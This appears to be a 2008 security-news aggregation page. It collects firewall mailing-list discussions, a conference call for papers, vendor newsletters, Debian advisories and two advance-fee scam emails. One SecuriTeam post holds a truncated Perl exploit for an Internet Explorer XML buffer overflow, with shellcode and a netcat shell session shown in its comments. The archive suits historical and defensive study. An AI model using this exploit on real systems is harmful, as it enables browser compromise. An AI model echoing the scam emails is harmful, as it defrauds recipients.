> proxy on the outside to point to your SMTP server for SMTP traffic. That way
> a state can be created with a SYN from the proxy to your SMTP IP. Another
> is same-security-traffic permit {inter-interface | intra-interface} using
> the intra-interface, but this renders the spoofing useless and with the
> possibility of a compromise, now the possibility of the attacker spoofing
> your subnet for everything on the network he/she attacks. A log nightmare
> and hard to determine what is legitimate traffic vs. malicious. It is new
> and I have not used it a lot, since I do not have those configurations in
> front of me I cannot say conclusively this will work.
>
> Thank You,
> Chris Myers
> clmmacunix@charter.net
> John 1:17
> For the Law was given through Moses; grace and truth were realized through
> Jesus Christ.
>
> Go Vols!!!!
> On Dec 12, 2008, at 3:17 AM, Rudy Setiawan wrote:
>
> Hi,
>
> we have a firewall, both outside and inside interfaces.
> We have a SMTP server that lives in the inside network
> and it's translated to a public IP on the outside interface.
> SMTP inside IP: 10.10.1.2
> Translated IP: 216.15.4.4
> in the pix (version 7.2.3)
> static (inside,outside) 216.15.4.4 10.10.1.2 netmask 255.255.255.255
>
> I have a workstation with IP 10.10.1.4 which has a translated IP of
> 216.15.4.6
>
> From my workstation I tried to access 216.15.4.4 port 25 or ping
>
> 216.15.4.4. I got request timed out.
>
> I have access-list that allows icmp as well as port 25 on the 216.15.4.4 IP.
> I am able to access port 25 and ping the IP from anywhere in the world.
>
> How can I permit such traffic?
>
> Thanks,
> Rudy
> _______________________________________________
> firewall-wizards mailing list
> firewall-wizards@listserv.icsalabs.com
> https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards
>
>
> _______________________________________________
> firewall-wizards mailing list
> firewall-wizards@listserv.icsalabs.com
> https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards
>
>


------------------------------

Message: 2
Date: Fri, 19 Dec 2008 15:50:56 -0800
From: "LayerOne Call For Papers" <layeronecfp@gmail.com>
Subject: [fw-wiz] LayerOne 2009 - Call For Papers
To: "Layer One" <layeronecfp@gmail.com>
Message-ID:
<956f3b8e0812191550t2fbf4b66td6477a673c5f7c55@mail.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"

*LayerOne 2009 Security Conference
Call for Papers
*
May 23 & 24, 2009
Anaheim, California (Anaheim Marriott)
http://layerone.info/

The sixth annual LayerOne security conference is now accepting submissions
for topic and speaker selection. As always, we are interested seeing a broad
range of pertinent topics, and encourage all submissions. Some of our past
presentations have included:

- Virtualization
- Forensics / Anti-Forensics Techniques
- Hardware Hacking (GSM, Proximity Cards, Access Control Systems)
- Law / Legal Issues
- Malware
- VoIP
- Cryptographic Cracking Using FPGA Technology

We would love to see the same breadth and depth of submissions as we have in
previous years, so if you have an idea you're on the fence about - please
send it in! For a complete list of past presentations, click
here<http://layerone.info/?page_id=3>
.

Please be sure to include the following information in your submission:

- Presentation name
- A one-sentence synopsis of your topic
- A longer one to three paragraph synopsis or short outline of what you plan
on covering
- Names, email addresses and URLs of the presenter(s)
- A short (single-paragraph) biography of the presenter(s)

Once everything is ready to go, please email your submission to cfp [at]
layerone [dot] info no later than April 1, 2009. You will receive notice no
later than April 15, 2008 to let you know if your talk has been accepted.

As we have a single presentation track, please bear in mind that speaking
slots are limited to one hour. While presenters typically divide the hour
into separate presentation and Q&A sessions, you may structure your time
however you see fit. If you think your presentation will run longer, or have
any special requirements, please include this information in your submission
and we will do our best to accommodate you.

Note: If the presentation is based upon code or a particular technique, the
presenter must be one of the developers of the code or technique and be
prepared to perform a demonstration.

We look forward to reviewing your submissions, and anticipate another great
line-up for this year's conference. Once again, if you have any questions
about your submission, please email cfp [at] layerone [dot] info. Thank you
for your interest, and we look forward to seeing you there!

Sincerely,
-The LayerOne Team
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://listserv.icsalabs.com/pipermail/firewall-wizards/attachments/20081219/f2633bc4/attachment-0001.html>

------------------------------

Message: 3
Date: Fri, 19 Dec 2008 10:35:25 -0800
From: "Lucas Thompson" <lucas.thompson@gmail.com>
Subject: Re: [fw-wiz] accessing SMTP server via the translated address
To: "Firewall Wizards Security Mailing List"
<firewall-wizards@listserv.icsalabs.com>
Message-ID:
<ee7ec9e70812191035s5e18db54i48ffa5badc66568d@mail.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1

I don't think this is necessarily the case. Some devices support this
kind of configuration and others do not. Cisco seems to have a
specific term for it -- 'hairpinning', and it is apparently supported
in later versions of PIX. I don't know enough about PIX specifically,
but if you google this term you'll find discussions on the subject.
Then you don't have to worry about splitting the DNS.


On Fri, Dec 12, 2008 at 6:14 PM, Chris Myers <clmmacunix@charter.net> wrote:
> You cannot do it conventionally. The firewall sees it as a spoofed address.
> You cannot go out to the internet and back in the same interface for a
<snip..>


------------------------------

Message: 4
Date: Thu, 25 Dec 2008 19:34:36 +0100
From: Christoph Mayer <mayer@tm.uka.de>
Subject: Re: [fw-wiz] Windows dynamic ARP
To: firewall-wizards@listserv.icsalabs.com
Message-ID: <4953D23C.3050100@tm.uka.de>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed

On Thu, Dec 4, 2008 at 12:08 PM, James <jimbob.coffey at gmail.com> wrote:
> On Thu, Nov 27, 2008 at 3:51 AM, Mike O'Connor <mjo at dojo.mi.org>
wrote:
>> :Does anyone know a way to turn OFF dynamic ARP on Windows? I'd like to
>> :set up a network where static ARP entries are the only way to
>> :communicate.
>
> More IDS than IPS but Xarp will at least report any changes.
> If you control the environment you could static map any unused ip
> space on each host and then use the Xarp Static preserve filter but a
> pretty horrible cludge when al you want is a layer 2 packet filter to
> prevent an arp request or reply leaving your hosts.

> Actually an easier way would be to use the requestedresponse filter in
> Xarp. This only allows a response if your host generated a request.
> If you are static mapping ip to mac you should never generate a
> request.


Unfortunately XArp can't really 'filter' (drop) the packets, but alert
you. I am currently working on a Linux port where writing a network
driver for filtering is easier than on Windows. Still, XArp is the best
solution as firewalls seldom do ARP filtering and those that do perform
ARP filtering have very primitive filters.

If you want to get an overview of mechanisms available for ARP attack
detection, you can have a look at a (yet incomplete) presentation I once
started: http://www.chrismc.de/development/xarp/arp_security_tools.html
(http://www.chrismc.de/development/xarp/Securing_ARP_0_2_0.pdf)

Best regards,
Chris
--
Dipl.-Inform. Christoph P. Mayer
Institute of Telematics, University of Karlsruhe (TH)
Zirkel 2, 76128 Karlsruhe, Germany
Phone: +49 721 608 6415, Email: mayer@tm.uka.de
Web: http://www.tm.uka.de/~mayer/

------------------------------

_______________________________________________
firewall-wizards mailing list
firewall-wizards@listserv.icsalabs.com
https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards


End of firewall-wizards Digest, Vol 32, Issue 11
************************************************

Whitepaper Donwload Alert: December 29, 2008

Whitepaper Download Alert Network World logo
NetworkWorld.com | Resource Library | Update Your Profile

12/29/08

Check out Network World's comprehensive library of whitepapers for IT professionals, which includes carefully selected topics that matter most to your organization. Each week you will receive updates sent straight to your inbox. You can see all of the available whitepapers at: http://www.networkworld.com/resourcelibrary/?type=whitepaper

placeholder

HP
Next-Generation Technology for Virtual I/O and Blade Servers
Discover the power of blade servers coupled with virtual I/O in this whitepaper from respected consulting firm IDC. The benefits include reducing server provisioning and management efforts, simplifying and consolidating networks and tailoring network speeds based on your application requirements. Find out how you can improve your TCO today.


placeholder

Double-Take Software
Leveraging your SAN to Reduce Costs.
Save time and money when deploying new computers with next-generation storage management tools. Find out how in this whitepaper, "More Functionality, Less Infrastructure." Discover management tools that separate boot disks from systems and turn them into stateless compute devices running from an iSCSI SAN. Get all of the details today.


placeholder

Oracle
The Benefits of Grid Computing.
Grid computing improves utilization levels, reduces power consumption, management costs and lets you realize a better return on your hardware investment. Find out how you can overhaul your IT department with grid computing in this whitepaper. Also learn how real-world users are benefiting from this technology today. Download this whitepaper now.


placeholder

Trend Micro
Four Layers of Security Protection.
Web threats are coming at you from every angle. This whitepaper reveals how to protect your network at four different layers to successfully fight the latest web threats. The four layers of protection are deployed in the cloud, at the Internet gateway, across network servers and at the end points. Download this whitepaper now.


placeholder

Message Labs
Successfully Protecting your Email.
Find out how managed email security services offer the most cost-effective email protection available. Managed offerings bundle many security features including anti-spam, anti-virus and policy-based encryption. It's easier to deploy and it costs less. Get all of the details today. Download this whitepaper now.


placeholder

MessageLabs
Blocking Spam at Least 99% of the Time
By taking a multi-layered approach to fighting spam you stand the best chances of keeping unwanted emails off your systems. Realize a 99% spam capture rate with near-zero false positives with a robust anti-spam email service. Download this whitepaper to get all of the details today.



 


This email was sent to security.world@gmail.com

Complimentary Subscriptions Available
for newsletter subscribers. Receive 50 issues
of Network World Magazines, in print or
electronic format, free of charge, Apply here.

Terms of Service/Privacy

 

Subscription Services Update your profile
To subscribe or unsubscribe to any Network
World newsletter, change your e-mail
address or contact us, click here.

Unsubscribe

Network World, Inc., 492 Old Connecticut Path, Framingham, MA 01701
Copyright Network World, Inc., 2008

www.networkworld.com

 

 



Urgent respond

I have a new email address!
You can now email me at: mar_tindentzz@ymail.com

Sir/Madam,

I've business to discuss with you, please contact me, for more details

Dent


- Martin Dent

Saturday, December 27, 2008

[EXPL] Microsoft Internet Explorer XML Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Microsoft Internet Explorer XML Buffer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

The following exploit utilizes the XML vulnerability in Internet Explorer
to execute arbitrary code under Vista.

DETAILS

Exploit:
#!/usr/bin/perl
# msie_xmlbof_vista.pl
# Microsoft Internet Explorer XML Buffer Overflow Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# I wanted a reliable shell, so I figured I'd whip up something nice for
IE7+Vista
# Only the first hundred calculators popping up on the screen is hilarious
# Core/Concepts from other available exploits... Yeah, thanks
skylined/krafy/muts
#
# bash$ perl msie_xmlbof_vista.pl
# Usage: msie_xmlbof_vista.pl <filename.html>
# bash$ perl msie_xmlbof_vista.pl /var/www/msie_xmlbof_vista.html
#
# *** Launching IE7 on Vista SP1 with URL:
http://192.168.100.105/msie_xmlbof_vista.html ***
#
# bash$ nc 192.168.100.118 30702
# Microsoft Windows [Version 6.0.6001]
# Copyright (c) 2006 Microsoft Corporation. All rights reserved.
#
# C:\Users\vista\Desktop>
#
# Enjoy :)

$filename = $ARGV[0];
if(!defined($filename))
{

print "Usage: $0 <filename.html>\n";

}

$exploit = '<html>' . "\n" . '<div id="msie_xmlbof_vista">x</div>' .
'<script>' . "\n\n" .
'var shellcode =
unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b" +
' . "\n" .
'
"%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac" + ' . "\n"


========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Successfully Accelerate your Web Apps

Download these resources to learn how you can give your Web applications a performance boost.

We hope you enjoy these informative whitepapers.


Sincerely,
Network World, Inc.


To unsubscribe, change your preferences, or change your e-mail address, go to the following URL:
http://optout.nww.com/nwwonline.aspx?emid=fy%2fmU7wupoHn0q7JFEHpdPr7bfGFXQ4iss%2b9rKvFX5A%3d
If the above URL is not enabled as a link, please copy it in to your browser window to access our Preferences Page.

Read Network World's privacy policy at http://networkworld.com/tos.html

Network World, Inc.
492 Old Connecticut Path
Framingham, MA 01701

 

 

Compliment of the Season

I have a new email address!
You can now email me at: goldagent6@yahoo.in



- Hello, It is my pleasure to bring to your notice a fruitful business relationship.There is 250kg of pure raw gold dust 23 carrat, in my position and I want you to find a gold smith or person who can buy it at very cheap price,10% comission is yours if you found one. Regards.Joseph Owusu.

[SECURITY] [DSA 1693-1] New phppgadmin packages fix several vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1693-1 security@debian.org
http://www.debian.org/security/ Thijs Kinkhorst
December 27, 2008 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : phppgadmin
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2007-2865 CVE-2007-5728 CVE-2008-5587
Debian Bugs : 427151 449103 508026

Several remote vulnerabilities have been discovered in phpPgAdmin, a tool
to administrate PostgreSQL database over the web. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-2865

Cross-site scripting vulnerability allows remote attackers to inject
arbitrary web script or HTML via the server parameter.

CVE-2007-5728

Cross-site scripting vulnerability allows remote attackers to inject
arbitrary web script or HTML via PHP_SELF.

CVE-2008-5587

Directory traversal vulnerability allows remote attackers to read
arbitrary files via _language parameter.

For the stable distribution (etch), these problems have been fixed in
version 4.0.1-3.1etch1.

For the unstable distribution (sid), these problems have been fixed in
version 4.2.1-1.1.

We recommend that you upgrade your phppgadmin package.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1.orig.tar.gz
Size/MD5 checksum: 703673 eedac65ce5d73aca2f92388c9766ba1b
http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch1.dsc
Size/MD5 checksum: 890 e6dea463d597f6dda40d774820e3bb03
http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch1.diff.gz
Size/MD5 checksum: 15678 1cbe0f619e65a8c49894e8c0fe015fb5

Architecture independent packages:

http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch1_all.deb
Size/MD5 checksum: 704386 1f5b68f6be269eb3c10646cd8d69c31c


These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSVYXX2z0hbPcukPfAQL7Jgf8D01CiY6dpQO7AUmDCU/sNIHnMudx5ZEC
y/Yk0b2raMmtJeejXpdD4zRpPGOIx4LBefh2BmyyC18vPzdjbX/5MbXvOewmeqm3
6eI6clMf5rpbb7jnzL1SxqMwt+7YocmU30JiWMbuXggrCUpawsxROTMIJkVqT86c
Yg8DKOWpLt43YAYl+IRx2sbmDP/kGN2omn6pBnkqcIeQh8wB7CNmSEeSlkH0iOTS
EoTOyjTWhTFAz1T8bG6A6YSmgBSTZ+tEb1eqODMB1y8POQ7k4B4MmCA1OPNtJuoq
EEB2KoaDJkkhS8anv2fyYEmufZBTqD8AGsFPGttqSMBQyR9XdYD5cg==
=J4km
-----END PGP SIGNATURE-----


--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

[SECURITY] [DSA 1692-1] New php-xajax packages fix cross-site scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1692-1 security@debian.org
http://www.debian.org/security/ Steffen Joeris
December 27, 2008 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : php-xajax
Vulnerability : insufficient input sanitising
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2007-2739

It was discovered that php-xajax, a library to develop Ajax
applications, did not sufficiently sanitise URLs, which allows attackers
to perform cross-site scripting attacks by using malicious URLs.

For the stable distribution (etch) this problem has been fixed in
version 0.2.4-2+etch1.

For the testing (lenny) and unstable (sid) distributions this problem
has been fixed in version 0.2.5-1.

We recommend that you upgrade your php-xajax package.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4-2+etch1.dsc
Size/MD5 checksum: 648 f4bbc450f631e1a000679690858997ff
http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4-2+etch1.diff.gz
Size/MD5 checksum: 3441 37934d6df03bca92b0ee2d029b46faa4
http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4.orig.tar.gz
Size/MD5 checksum: 48261 58229c55be17c681a22699b564e6be26

Architecture independent packages:

http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4-2+etch1_all.deb
Size/MD5 checksum: 44770 152e977b65bc603155947edf9738ab31


These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJVflRAAoJEL97/wQC1SS+hcIH/0kGCBer0lWzivFYSjuomfpe
vS3FmudLu7K4wf2HMhQkBYV9krH2S6Jyki16k6hmerh5cDDOlrZxKuLFkqUfPBIr
Xd2XQC51gP7+/l6W3jEdsndiqPFx5uJhklzUddKrg665EqyDXxG2GIDwvJ67P7YG
+GY2ngEEIkGnr9akEPVWXIUS2NTMm45RpS0l1ZjK7tuSNWwLYg66JLKhXcwV7THJ
DUMex6/6HlZdXgezxpbM3hDwc6sa9bK+/LBIcgcxbLcdbV8ODGCvH+Z0OmYtEsov
4/TGaNlI+OgdoCtC2t9+6HeA31SYyaxN79qhM8B7W5OI5gN+xGxjkAKsb29jA70=
=xPXX
-----END PGP SIGNATURE-----


--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Friday, December 26, 2008

About Net Security: December 26, 2008

About.com    Net Security
In the Spotlight | More Topics |
  from Tony Bradley, CISSP-ISSAP
Well, Christmas is over. Happy Boxing Day to those in the United Kingdom, Canada, Australia, and New Zealand, and a continued Happy Hannukah to my Jewish readers. Everyone likes to do lists at the end of a year. There are lists of the greatest, worst, most memorable, best, etc. of the previous year, and many lists attempting to prognosticate events for the year to come. This week I posted a list of the Top 10 things that *won't* happen for IT security in 2009. Take a look at that and other recent news below. Have a safe and fun New Year's Eve, and we'll talk again in 2009.

 
In the Spotlight
2009 Information Security Predictions...Not
Can you predict the future? I won't say that I think it is entirely impossible, but I will say that I am pretty sure that if someone did have such ability they would find some better way to use it (whether for good or evil) than buying a 10 foot neon sign and doing $5 fortune teller readings. Despite the apparent lack of legitimate prescience, it doesn't stop just about everyone (and their proverbial 'grandmother') from making predictions about the coming year as this one comes to a close. Don't get me wrong. I think it can be fun if...read more

 
           More Topics
Poll: What Is Your Primary Operating System?
Good, bad, or indifferent, it seems like 2008 was the year of Windows Vista. Windows Vista was subject to much criticism. Some of it was legitimate. Much of it was misguided. As the Windows Mojave Project proved, the bad press and negative marketing from competitors like Apple apparently worked though. Users who had no firsthand knowledge of Windows Vista and no idea why they apparently didn't like it, were very impressed with the operating system when they thought it was a Top Secret Beta version of the next...read more

 
How Is Data Compromised? Let Us Count The Ways
Money may be hard to come by in this economy, especially during the holiday season, but there is one thing that is never in short supply as a year comes to a close- lists. There are lists for best song, worst movie, memorable moments, and just about anything you can think of. It does eventually get to be overkill, but some of the lists are kind of cool. Actually, one of the things that occurs to me with almost every one of these lists is "that just happened this year?!?!" Things that occurred back in January or February seem like they are from the distant past...read more

 
 
Sponsored Links
 
Best Moves in a Bad Economy
Save & Invest the Right Way
Find out how to beat a bear market, make smart choices, and keep your cool even when the economy is unpredictable.

Internet / Network Security Ads
Advertisement
 
 
Visit Related About GuideSites:
Wireless / Networking Antivirus Software Focus on Windows
Email internet  
Search About   

 
Sign up for more free newsletters on favorite topics.

You are receiving this newsletter because you subscribed to the About Net Security newsletter as security.world@GMAIL.COM. If you wish to change or remove your email address, please visit:
http://www.about.com/nl/usgs.htm?nl=netsecurity&e=security.world@GMAIL.COM

About respects your privacy. Our Privacy Policy.

Our Contact Information.
249 West 17th Street
New York, NY, 10011

© 2008 About, Inc.